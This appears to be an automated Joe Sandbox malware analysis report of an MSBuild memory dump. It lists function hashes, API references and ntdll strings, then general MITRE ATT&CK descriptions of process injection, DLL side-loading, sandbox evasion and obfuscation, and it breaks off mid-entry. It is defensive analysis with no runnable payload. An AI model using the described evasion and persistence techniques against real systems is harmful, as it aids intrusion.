Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: ___swprintf_l
String ID:
API String ID: 48624451-0
Opcode ID: 0302eb61b397cf347266ad83a1011c94fee47d65636723d66495280fcb473ee3
Instruction ID: 32cbeb6fcaf52be9c1d68b12041dd629959d36c4905c6e6d56113a1c1359d719
Opcode Fuzzy Hash: 0302eb61b397cf347266ad83a1011c94fee47d65636723d66495280fcb473ee3
Instruction Fuzzy Hash: C951D5B2A04216BEDB25DB9DC89097EFBF8BF48240B148269F4D5D7681D374DE408BA0

Function 010AA250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON

Download Yara Rule

Strings

SsHd, xrefs: 010AA3E4
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010F79D5
RtlpFindActivationContextSection_CheckParameters, xrefs: 010F79D0, 010F79F5
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010F79FA

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID:
String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-929470617
Opcode ID: a37829518e34e07e859584a871a916ff88de45ffd2352374846b19dae57f837a
Instruction ID: fccb131f09f173af7b00dd9677c4f230aec494545ed4ac99afc78d5b809825ba
Opcode Fuzzy Hash: a37829518e34e07e859584a871a916ff88de45ffd2352374846b19dae57f837a
Instruction Fuzzy Hash: 5DE1D131704302CFE765CEA8C884B6ABBE1BB88214F544A6DFAE5CB2D1D731D945CB52

Function 010AD770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010F948C

Strings

GsHd, xrefs: 010AD874
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010F9346
RtlpFindActivationContextSection_CheckParameters, xrefs: 010F9341, 010F9366
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010F936B

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-576511823
Opcode ID: 9b887cee7d69d2242811a66273411ef8fdff76b3fc8811c3fb4fe0793f620b1e
Instruction ID: 90cee6353113de5fb3ba9dc687218789c6ec860f0ca64c50f7c0debac06067a3
Opcode Fuzzy Hash: 9b887cee7d69d2242811a66273411ef8fdff76b3fc8811c3fb4fe0793f620b1e
Instruction Fuzzy Hash: 55E1E3706043029FDB64CF98C481B6ABBE5FF88718F444A6DFAD58BA81D771E944CB42

Function 010DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 010DB6BF

Strings

0, xrefs: 010DB66F
0, xrefs: 010DB695
-, xrefs: 010DB650
+, xrefs: 010DB65A

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction ID: 582b324c6da8b0307db1e822303885c413d269c798ff45073703d5aec0b2c8b6
Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction Fuzzy Hash: B481BF70E053499FEF658E6CC8917FEBBE1BF4A360F1A4199E8E1A7291C7348841CB51

Function 01099126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010F2559

Strings

@, xrefs: 01099175
$, xrefs: 01099191

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 9492de8961af98c661aa089d86dc926c7202d2bf0b2da02ed9b1c014f6db3cab
Instruction ID: 2b7a1d4c8c00b6a9373a23b7b5bf5ba13b46310ed1a52a41d1af619d2755095f
Opcode Fuzzy Hash: 9492de8961af98c661aa089d86dc926c7202d2bf0b2da02ed9b1c014f6db3cab
Instruction Fuzzy Hash: EC811A71D002699BDB35DB54CC45BEEBBB8AB48754F0041EAEA59B7680D7309E84CFA0

Function 010D4960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010D49A4

Strings

0Ivw, xrefs: 010D4A13
0Ivw, xrefs: 010D4A23
X, xrefs: 010D49F0
0Ivw, xrefs: 010D4A03

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0Ivw$0Ivw$0Ivw$X
API String ID: 3446177414-3775388739
Opcode ID: 9954f4077bf93739c754234c9f5df82cbaf91bf1a0b94c39334f032a5786205e
Instruction ID: 6120ab9090891972562c6ed2c243eea41dcf453b0d565b39dbce9addf7254990
Opcode Fuzzy Hash: 9954f4077bf93739c754234c9f5df82cbaf91bf1a0b94c39334f032a5786205e
Instruction Fuzzy Hash: D631A03190474EEBCF26DF98D840B9D7BB1AB84758F0A806DFD949A241D3708A91CF86

Function 01114755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01114809

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01114888
minkernel\ntdll\ldrredirect.c, xrefs: 01114899
LdrpCheckRedirection, xrefs: 0111488F

Memory Dump Source

Source File: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: d05bc8708d6c12eb658ed3914ca7acb9e0a8197e28b1b6f415af2ba02c44dd15
Instruction ID: f9af7997784dad109e90d7e8775426454fc321897fa7171dde2a41a749741d4e
Opcode Fuzzy Hash: d05bc8708d6c12eb658ed3914ca7acb9e0a8197e28b1b6f415af2ba02c44dd15
Instruction Fuzzy Hash: 0B41C372A04A519FCB29CE9CD840A26FBE4AF49F50F0A457DED999BB19D730D800CB91

Function 0108C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0108C0B4
RtlDebugPrintTimes.NTDLL ref: 010ED623
RtlDebugPrintTimes.NTDLL ref: 010ED651

Strings

$, xrefs: 0108C07C

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: fe8a2e18f166083820272b3ba3effcdcea1ab90df6606e28bd00fbb2a433332d
Instruction ID: 08259416df7886df58a6afb0456ee0ea515ed4975a55b0af659645fa4bbed0c8
Opcode Fuzzy Hash: fe8a2e18f166083820272b3ba3effcdcea1ab90df6606e28bd00fbb2a433332d
Instruction Fuzzy Hash: F9115232904218EFCF15AF95D8486DC7BB1FF44764F108129F966672E0CB315A40CF80

Function 010BEF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e2d3a512341e599c27e076e6021774c5298871a350f63752e93d92ead18f13b
Instruction ID: 5300d7df0f1b9a373f520062c8196250c978dc177ef0d6760e66847ffdc8d664
Opcode Fuzzy Hash: 6e2d3a512341e599c27e076e6021774c5298871a350f63752e93d92ead18f13b
Instruction Fuzzy Hash: 19E10171D00609DFCB65CFA9C980AEDBBF1FF48314F24496AE986A7661D770A841CF50

Function 0110EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0110EFE1
RtlDebugPrintTimes.NTDLL ref: 0110F009
RtlDebugPrintTimes.NTDLL ref: 0110F0AC
RtlDebugPrintTimes.NTDLL ref: 0110F160

Memory Dump Source

Source File: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 3eda7ebb3ee8cc783738ff67cdd2fe5b94936c785c9941318ba30018b02d7691
Instruction ID: 81b4c0bb14d379bd310580141b8b4bc2285a0ef97c975a987bfa61943956b295
Opcode Fuzzy Hash: 3eda7ebb3ee8cc783738ff67cdd2fe5b94936c785c9941318ba30018b02d7691
Instruction Fuzzy Hash: 49715A71E0021A9FDF1ACFA4C985ADDBBF5BF48314F04802AE905FB294D7B4A906CB50

Function 0110F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0110F26D
RtlDebugPrintTimes.NTDLL ref: 0110F292
RtlDebugPrintTimes.NTDLL ref: 0110F324
RtlDebugPrintTimes.NTDLL ref: 0110F378

Memory Dump Source

Source File: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 3e0ca2171c56df9ea037df31b84950c8735ee8bb703fac7ae487b44cd6f8318c
Instruction ID: 75089dd51de6ba147136221a05958e5a922b7097cad30147f7e5d289536e41b9
Opcode Fuzzy Hash: 3e0ca2171c56df9ea037df31b84950c8735ee8bb703fac7ae487b44cd6f8318c
Instruction Fuzzy Hash: DD514575E0421ADFDF1ACF98D8466DCBBB1BF88324F18802AE915BB290D7749942CF54

Function 010AD02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010AD3A4

Strings

Bl, xrefs: 010AD48C
l, xrefs: 010AD46B

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Bl$l
API String ID: 3446177414-208461968
Opcode ID: d95f314fa265f32b7d63ea8ff1312e8c2d924674b35985641ed1209fc079123f
Instruction ID: 14e643d89b055a7452963b242870a093719d713711d17533532c60559ad1df2b
Opcode Fuzzy Hash: d95f314fa265f32b7d63ea8ff1312e8c2d924674b35985641ed1209fc079123f
Instruction Fuzzy Hash: 1BA1C431A003198BEB75DBD8C890BEEB7F1BB44704F4480E9D989A7A41DB74AE84CF51

Function 010C4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 010C4CC3
Flst, xrefs: 010C4C96

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 8ca8543130b9dac976b1f0641eaa6a07840e0a1f29d3e25385709826ec678c7a
Instruction ID: 4e484676c251bc8f4d2a8d1a3cbf761e0df481376956d344f84661d7b8882569
Opcode Fuzzy Hash: 8ca8543130b9dac976b1f0641eaa6a07840e0a1f29d3e25385709826ec678c7a
Instruction Fuzzy Hash: D45158B1E006188FDB26EF99C8946ADFBF4FF44B14F14806ED099DB291E7719985CB80

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
